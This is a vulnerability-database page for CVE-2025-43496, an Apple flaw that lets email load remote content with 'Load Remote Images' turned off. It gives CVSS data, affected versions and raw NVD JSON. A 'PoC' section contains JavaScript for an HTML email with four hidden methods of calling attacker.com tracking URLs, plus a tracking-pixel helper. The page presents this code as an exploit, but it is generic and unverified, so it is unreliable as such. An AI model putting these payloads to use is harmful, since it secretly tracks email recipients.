Security Vulnerability Report
CVE-2025-43496 CVSS 7.5 HIGH

CVE-2025-43496

Published: 2025-11-04 02:15:53
Last Modified: 2026-04-02 19:20:55

Description

The issue was addressed by adding additional logic. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Sequoia 15.7.2, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. Remote content may be loaded even when the 'Load Remote Images' setting is turned off.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:* - VULNERABLE
Apple iOS < 18.7.2
Apple iOS < 26.1
Apple iPadOS < 18.7.2
Apple iPadOS < 26.1
Apple macOS Sequoia < 15.7.2
Apple macOS Tahoe < 26.1
Apple visionOS < 26.1
Apple watchOS < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-43496 PoC - Remote Image Loading Bypass
// This PoC demonstrates the concept of bypassing the 'Load Remote Images' setting

// Malicious HTML email content that bypasses the image loading restriction
const maliciousEmailContent = `
<html>
<body>
<!-- Method 1: Using CSS background-image -->
<div style="width: 1px; height: 1px; background-image: url('https://attacker.com/track?uid=12345&time=${Date.now()}'); background-repeat: no-repeat;"></div>
<!-- Method 2: Using SVG with external reference -->
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
<image href="https://attacker.com/track2?uid=12345"/>
</svg>
<!-- Method 3: Using CSS @import -->
<style>
@import url('https://attacker.com/track3?uid=12345');
</style>
<!-- Method 4: Using preload link -->
<link rel="preload" href="https://attacker.com/track4?uid=12345" as="image">
</body>
</html>
`;

// Simulate sending the malicious email
function sendMaliciousEmail(targetEmail) {
  return {
    to: targetEmail,
    subject: 'Important: Please Review',
    html: maliciousEmailContent,
    timestamp: new Date().toISOString()
  };
}

// Attacker's tracking endpoint (simulated)
function createTrackingPixel() {
  return `<img src="https://attacker.com/pixel.gif?cve=2025-43496" style="display:none">`;
}

// Export for testing
module.exports = { sendMaliciousEmail, createTrackingPixel };

References

https://support.apple.com/en-us/125632
https://support.apple.com/en-us/125633
https://support.apple.com/en-us/125634
https://support.apple.com/en-us/125635
https://support.apple.com/en-us/125638
https://support.apple.com/en-us/125639

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43496", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:52.783", "lastModified": "2026-04-02T19:20:54.813", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed by adding additional logic. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Sequoia 15.7.2, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. Remote content may be loaded even when the 'Load Remote Images' setting is turned off."}, {"lang": "es", "value": "El problema se abordó añadiendo lógica adicional. Este problema se ha corregido en iOS 18.7.2 y iPadOS 18.7.2. El contenido remoto puede cargarse incluso cuando el ajuste 'Cargar imágenes remotas' está desactivado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "6D51AEDC-9086-4010-B3BF-C652D65D09C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "3981A7BE-BC98-4C6F-AE38-D68839368925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.7.2", "matchCriteriaId": 
"DD6E8540-AC8B-40E0-945A-8D4C465E8471"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "7DFD3616-65CA-4E5C-849C-3C20ACBCB610"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "9F9D7F76-13FB-407C-94E5-221B93021568"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125632", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125633", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125635", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125638", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125639", "source": "[email protected]"}]}}